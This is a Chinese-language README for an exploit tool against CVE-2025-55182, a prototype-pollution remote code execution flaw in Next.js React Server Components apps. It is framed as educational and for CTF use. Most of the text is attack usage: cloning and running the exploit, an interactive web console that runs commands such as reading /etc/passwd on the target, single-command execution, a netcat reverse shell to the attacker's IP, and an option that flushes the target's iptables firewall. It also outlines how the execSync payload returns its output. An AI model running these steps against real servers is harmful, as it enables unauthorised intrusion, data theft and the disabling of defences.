WEB-CLI_RCE_React2Shell 是一个针对 CVE-2025-55182 的教育性 PoC 漏洞利用工具,该漏洞是使用 React Server Components 的 Next.js 应用程序中的一个严重原型污染缺陷。它专为 CTF 和研究而设计,具有单命令模式、交互式 Web CLI 和反向 Shell 功能,用于演示 RCE。
该工具是一个针对 CVE-2025-55182 的简单概念验证(PoC)漏洞利用程序。这是在使用了 React Server Components 的 Next.js 应用中发现的一个严重缺陷(原型污染)。
如果目标服务器存在漏洞,该脚本可让你在服务器上执行操作系统命令(远程代码执行,即 RCE)。
该工具专为学习、CTF 比赛和负责任的安全研究而构建。
请合乎道德地使用。 仅可针对你拥有或已获得明确书面测试许可的系统运行此漏洞利用程序。未经授权的使用属于违法行为。此工具仅供教育目的使用。
该工具有三种主要的命令运行方式:简单的单条命令、完整的交互式 Web 控制台,以及经典反弹 Shell 的尝试。
获取代码:
git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
cd REACT2SHELL
安装依赖库:
pip install requests
这是与目标交互最简单的方式。它会在你的机器上启动一个类似终端的本地网页。
运行脚本:
python3 exploit.py <TARGET_URL> --web-cli
示例: python3 exploit.py http://target.com/ --web-cli
打开浏览器: 脚本会提示你打开 http://127.0.0.1:8000/。然后你就可以直接在网页中输入命令(如 ls、whoami、cat /etc/passwd)。
运行单条命令并立即在本地终端中获取输出。适合快速检查,如查看你的用户 ID。
python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'
示例: python3 exploit.py http://target.com/ --cmd 'id'
如果你想要一个稳定、持久的连接,可使用此模式。注意: 由于防火墙(出站过滤)的存在,这在真实环境中经常失败。
启动你的监听器(例如 netcat):
nc -lvnp 55555
运行漏洞利用程序:
python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
-i <YOUR_IP>:你机器的 IP。-p 55555:你的监听器所使用的端口。--flush(可选):会先尝试在目标上运行 iptables -F 以清除主机防火墙。此漏洞利用程序通过 原型污染 缺陷实现 RCE。
Object.prototype)添加属性。child_process)。我们将该属性的值替换为我们的 shell 命令。execSync)并立即抛出一个无害的错误。命令输出被巧妙地塞入错误消息的 digest 字段中。随后 Python 脚本读取该字段以获取结果。本研究依赖于安全社区的初期工作与披露。感谢所有研究人员和开源贡献者。